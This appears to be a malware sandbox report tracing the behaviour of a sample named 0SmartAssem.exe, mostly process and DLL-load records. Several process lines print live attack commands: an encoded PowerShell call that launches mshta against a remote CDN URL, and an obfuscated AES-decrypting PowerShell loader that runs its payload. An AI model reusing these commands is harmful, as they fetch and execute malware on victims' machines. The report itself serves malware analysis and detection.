              Source: 0SmartAssem.exe String found in binary or memory: google.golang.org/grpc@v1.59.0/internal/balancerload/load.go
              Source: 0SmartAssem.exe String found in binary or memory: BLDfOLvpGE/load.go
              Source: 0SmartAssem.exe String found in binary or memory: ocated bad restart PC-thread limit stopm spinning nmidlelocked= needspinning=store64 failedsemaRoot queuebad allocCountbad span statestack overflow untyped args out of range no module data in goroutine internal error.in-addr.arpa.unknown mode: RegSetValueExWu
              Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\verification.b-cdn.net.ps1"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eC bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AYgBpAGQAdgBlAHIAdABpAHMAZQByAC4AYgAtAGMAZABuAC4AbgBlAHQALwBzAG0AYQByAHQAMQAiAA==
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://bidvertiser.b-cdn.net/smart1
              Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
              Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function HbAHmnxA($ZzZovm){return -split ($ZzZovm -replace '..', '0x$& ')};$PEcdKn = HbAHmnx[...]jqkxh = [System.Security.Cryptography.Aes]::Create();$jqkxh.Key = HbAHmnxA('52615577706262664D6D43476F4F4344');$jqkxh.IV = New-Object byte[] 16;$SpkOqCAK = $jqkxh.CreateDecryptor();$cWklkDGxO = $SpkOqCAK.TransformFinalBlock($PEcdKn, 0, $PEcdKn.Length);$mTmnXpOAf = [System.Text.Encoding]::Utf8.GetString($cWklkDGxO);$SpkOqCAK.Dispose();& $mTmnXpOAf.Substring(0,3) $mTmnXpOAf.Substring(3)
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\0SmartAssem.exe "C:\Users\user\AppData\Roaming\0SmartAssem.exe"
              Source: C:\Users\user\AppData\Roaming\0SmartAssem.exe Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: ieframe.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: imgutil.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: mlang.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\0SmartAssem.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\0SmartAssem.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\0SmartAssem.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32
              Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
              Source: Window Recorder Window detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
              Source: Binary string: r:\tinderbox\win-qt-5.15\out\qtbase\lib\Qt5SqlVBox.pdb00 source: Qt5SqlVBox.dll.5.dr
              Source: Binary string: D:\tinderboxa\win-7.0\out\win.amd64\release\obj\VBoxSharedClipboard\VBoxSharedClipboard.pdb source: VBoxSharedClipboard.dll.5.dr
              Source: Binary string: dialer.pdbGCTL source: mshta.exe memory dumps, smart1[1].3.dr
              Source: Binary string: BitLockerToGo.pdb source: 0SmartAssem.exe, 00000008.00000003.1981482070.0000022BEFA80000.00000004.00001000.00020000.00000000.sdmp, 0SmartAssem.exe, 00000008.00000003.1981404969.0000022BEFD30000.00000004.00001000.00020000.00000000.sdmp, 0SmartAssem.exe, 00000008.00000002.1998133835.000000C0004BB000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: r:\tinderbox\win-qt-5.15\out\qtbase\lib\Qt5PrintSupportVBox.pdb22 source: Qt5PrintSupportVBox.dll.5.dr
              Source: Binary string: r:\tinderbox\win-qt-5.15\out\qtbase\lib\Qt5PrintSupportVBox.pdb source: Qt5PrintSupportVBox.dll.5.dr
              Source: Binary string: D:\tinderboxa\win-7.0\out\win.amd64\release\obj\VBoxSharedFolders\VBoxSharedFolders.pdb source: VBoxSharedFolders.dll.5.dr
              Source: Binary string: D:\tinderboxa\win-7.0\out\win.amd64\release\obj\VBoxSupLib\VBoxSupLib.pdb source: VBoxSupLib.dll.5.dr
